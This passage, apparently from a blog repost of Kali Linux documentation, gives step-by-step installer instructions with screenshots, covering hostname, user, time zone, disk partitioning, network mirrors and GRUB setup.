keymap. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/02-language-select.png"><img alt="02-language-select" class="alignnone wp-image-5763 size-full" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/02-language-select.png" width="800" /></a></li>
<li>Specify your geographic location.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/03-location.png"><img alt="03-location" class="alignnone size-full wp-image-5764" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/03-location.png" width="800" /></a></li>
<li>The installer will copy the image to your hard disk, probe your
network interfaces, and then prompt you to enter a hostname for your
system. In the example below, we’ve entered “kali” as our hostname. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/05-hostname.png"><img alt="05-hostname" class="alignnone wp-image-5765 size-full" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/05-hostname.png" width="800" /></a></li>
<li>You may optionally provide a default domain name for this system to use. <br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/06-domain.png"><img alt="06-domain" class="alignnone size-full wp-image-5766" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/06-domain.png" width="800" /></a></li>
<li>Next, provide a full name for a non-root user for the system.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/07-user.png"><img alt="07-user" class="alignnone size-full wp-image-5767" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/07-user.png" width="800" /></a></li>
<li>A default user ID will be created, based on the full name you provided. You can change this if you like.<br />
<a href="http://docs.kali.org/wp-content/uploads/2015/02/08-username.png"><img alt="08-username" class="alignnone size-full wp-image-5768" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/08-username.png" width="800" /></a></li>
<li>Next, set your time zone.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/09-timezone.png"><img alt="09-timezone" class="alignnone size-full wp-image-5769" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/09-timezone.png" width="800" /></a></li>
<li>The installer will now probe your disks and offer you four choices.
In our example, we’re using the entire disk on our computer and not
configuring LVM (logical volume manager). Experienced users can use the
“Manual” partitioning method for more granular configuration options.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/10-partitionmethod.png"><img alt="10-partitionmethod" class="alignnone size-full wp-image-5770" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/10-partitionmethod.png" width="800" /></a></li>
<li>Select the disk to be partitioned.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/11-selectdisk.png"><img alt="11-selectdisk" class="alignnone size-full wp-image-5771" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/11-selectdisk.png" width="800" /></a></li>
<li>Depending on your needs, you can choose to keep all your files in a
single partition — the default — or to have separate partitions for one
or more of the top-level directories. If you’re not sure which you want,
you want “All files in one partition”.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/12-partitioningscheme.png"><img alt="12-partitioningscheme" class="alignnone size-full wp-image-5772" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/12-partitioningscheme.png" width="800" /></a></li>
<li>Next, you’ll have one last chance to review your disk configuration
before the installer makes irreversible changes. After you click <em>Continue</em>, the installer will go to work and you’ll have an almost finished installation.<br />
<br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/13-finish-partitioning.png"><img alt="13-finish-partitioning" class="alignnone size-full wp-image-5773" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/13-finish-partitioning.png" width="800" /></a></li>
<li>Configure network mirrors. Kali uses a central repository to
distribute applications. You’ll need to enter any appropriate proxy
information as needed.<br />
<br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/14-networkmirror.png"><img alt="14-networkmirror" class="alignnone size-full wp-image-5774" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/14-networkmirror.png" width="800" /></a><br clear="none" /><div class="st-alert st-alert- ">
<div style="text-align: justify;">
<strong>NOTE!</strong> If you select “NO” in this screen, you will <strong>NOT</strong> be able to install packages from Kali repositories.</div>
</div>
</li>
<li>Next, install GRUB.
<a href="http://docs.kali.org/wp-content/uploads/2015/02/15-install-grub.png"><img alt="15-install-grub" class="alignnone size-full wp-image-5775" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/15-install-grub.png" width="800" /></a></li>
<li>Finally, click Continue to reboot into your new Kali installation.<br clear="none" /><br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/16-install-complete.png"><img alt="16-install-complete" class="alignnone size-full wp-image-5776" height="601" src="http://docs.kali.org/wp-content/uploads/2015/02/16-install-complete.png" width="800" /></a></li>
</ol>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3